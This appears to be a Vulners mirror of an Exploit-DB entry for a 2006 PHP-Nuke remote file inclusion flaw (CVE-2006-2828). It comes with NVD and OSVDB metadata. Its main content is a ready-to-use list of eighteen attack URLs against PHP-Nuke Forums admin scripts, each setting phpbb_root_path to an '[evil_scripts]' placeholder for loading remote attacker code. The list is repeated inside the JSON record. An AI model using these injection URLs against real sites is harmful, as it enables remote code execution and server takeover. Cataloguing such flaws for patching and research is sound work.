Search...

PHP-Nuke <= 7.9 Final phpbb_root_path Remote File Inclusions

2006-06-02T00:00:00

ID EDB-ID:1866
Type exploitdb
Reporter ddoshomo
Modified 2006-06-02T00:00:00

Description

PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions. CVE-2006-2828. Webapps exploit for php platform

                                        
                                            # Milli-Harekat Advisory ( www.milli-harekat.org )
# PHP-Nuke &lt;= All version - Remote File Include Vulnerabilities
# Risk : High
# Class: Remote
# Script : PHP NUKE ALL VERSION
# Credits : ERNE
# Thanks : Dj_ReMix,Eskobar,TR_IP,ÃŸy KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS
# Vulnerable :

http://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]
http://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]

# milw0rm.com [2006-06-02]

JSON Vulners Source

Initial Source

{"id": "EDB-ID:1866", "hash": "d3847c55ef6679106d35de7670843a12", "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP-Nuke <= 7.9 Final phpbb_root_path Remote File Inclusions", "description": "PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions. CVE-2006-2828. Webapps exploit for php platform", "published": "2006-06-02T00:00:00", "modified": "2006-06-02T00:00:00", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/1866/", "reporter": "ddoshomo", "references": [], "cvelist": ["CVE-2006-2828"], "lastseen": "2016-01-31T15:02:26", "history": [], "viewCount": 4, "enchantments": {"score": {"value": 6.7, "vector": "NONE", "modified": "2016-01-31T15:02:26"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2006-2828"]}, {"type": "osvdb", "idList": ["OSVDB:31776"]}], "modified": "2016-01-31T15:02:26"}, "vulnersScore": 6.7}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/1866/", "sourceData": "# Milli-Harekat Advisory ( www.milli-harekat.org )\n# PHP-Nuke <= All version - Remote File Include Vulnerabilities\n# Risk : High\n# Class: Remote\n# Script : PHP NUKE ALL VERSION\n# Credits : ERNE\n# Thanks : Dj_ReMix,Eskobar,TR_IP,\u00c3\u0178y KorsaN,OsL3m7,Poizonbox,Di_lejyoner and All MHG USERS\n# Vulnerable :\n\nhttp://www.site.com/modules/Forums/admin/index.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_board.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_disallow.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forumauth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_groups.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ranks.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_styles.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_user_ban.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_words.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_avatar.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_forums.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_mass_email.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_smilies.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_ug_auth.php?phpbb_root_path=[evil_scripts]\nhttp://www.site.com/modules/Forums/admin/admin_users.php?phpbb_root_path=[evil_scripts]\n\n# milw0rm.com [2006-06-02]\n", "osvdbidlist": ["31776"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}

{"cve": [{"lastseen": "2019-05-29T18:08:32", "bulletinFamily": "NVD", "description": "Global variable overwrite vulnerability in PHP-Nuke allows remote attackers to conduct remote PHP file inclusion attacks via a modified phpbb_root_path parameter to the admin scripts (1) index.php, (2) admin_ug_auth.php, (3) admin_board.php, (4) admin_disallow.php, (5) admin_forumauth.php, (6) admin_groups.php, (7) admin_ranks.php, (8) admin_styles.php, (9) admin_user_ban.php, (10) admin_words.php, (11) admin_avatar.php, (12) admin_db_utilities.php, (13) admin_forum_prune.php, (14) admin_forums.php, (15) admin_mass_email.php, (16) admin_smilies.php, (17) admin_ug_auth.php, and (18) admin_users.php, which overwrites $phpbb_root_path when the import_request_variables function is executed after $phpbb_root_path has been initialized to a static value.", "modified": "2018-10-18T16:43:00", "id": "CVE-2006-2828", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2828", "published": "2006-06-05T20:06:00", "title": "CVE-2006-2828", "type": "cve", "cvss": {"score": 6.4, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:N"}}], "osvdb": [{"lastseen": "2017-04-28T13:20:28", "bulletinFamily": "software", "description": "# No description provided by the source\n\n## References:\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435705/100/0/threaded\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435407/100/0/threaded\nMail List Post: http://www.securityfocus.com/archive/1/archive/1/435611/100/0/threaded\nISS X-Force ID: 27368\n[CVE-2006-2828](https://vulners.com/cve/CVE-2006-2828)\n", "modified": "2006-05-30T00:00:00", "published": "2006-05-30T00:00:00", "href": "https://vulners.com/osvdb/OSVDB:31776", "id": "OSVDB:31776", "title": "PHP-Nuke mainfile.php phpbb_root_path Remote File Inclusion", "type": "osvdb", "cvss": {"score": 6.4, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:NONE/"}}]}

PHP-Nuke &lt;= 7.9 Final phpbb_root_path Remote File Inclusions

Description

PHP-Nuke <= 7.9 Final (phpbb_root_path) Remote File Inclusions. CVE-2006-2828. Webapps exploit for php platform

PHP-Nuke <= 7.9 Final phpbb_root_path Remote File Inclusions